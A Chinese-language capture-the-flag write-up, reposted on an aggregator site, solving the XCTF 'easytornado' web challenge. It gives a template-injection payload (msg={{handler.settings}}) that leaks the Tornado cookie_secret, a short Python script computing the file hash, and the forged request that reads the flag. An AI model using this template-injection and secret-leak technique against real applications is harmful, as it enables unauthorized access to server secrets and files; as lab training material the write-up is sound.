題目

解題

1、訪問url

點進去看看

2、直接訪問/fllllllllllllag文件

發現報錯了，但我們發現URL中的Error是我們返回的Error，那么我們再來測試一下


發現可能存在SSTI漏洞，但被過濾了部分參數，所以不能使用

3、這里再回到題目信息easytornado，可以判斷出可能是一個python的tornado漏洞

因為我沒學過python的框架，就不詳細解析了，只寫payload
這里我們要訪問/fllllllllllllag文件，并且還要filehash正確，那么我們目前的問題就是獲取fllllllllllllag所對應的filehash的值
再由hints.txt可以可以看出，filehash的計算公式如下

md5(cookie_secret+md5(filename))

那么如何獲取cookie_secret呢？我們這邊直接上payload

http://111.200.241.244:51903/error?msg={{handler.settings}}

這時我們要訪問的url是

http://111.200.241.244:51903/file?filename=/fllllllllllllag&filehash=md5(c3169c94-9dde-4d74-ab37-4300ced3cc8c+md5(/fllllllllllllag))

此時我們來計算filehash

# -*- coding: UTF-8 -*- import hashlibresult = hashlib.md5() result.update('/fllllllllllllag'.encode('utf-8')) filename_md5 = result.hexdigest() result = hashlib.md5() result.update(('c3169c94-9dde-4d74-ab37-4300ced3cc8c' + filename_md5).encode('utf-8')) print(result.hexdigest())

最終payload

http://111.200.241.244:51903/file?filename=/fllllllllllllag&filehash=0b2258f726a9bd96f61d7c3eef39ca0f

總結

以上是生活随笔為你收集整理的XCTF-Web-高手区-easytornado的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。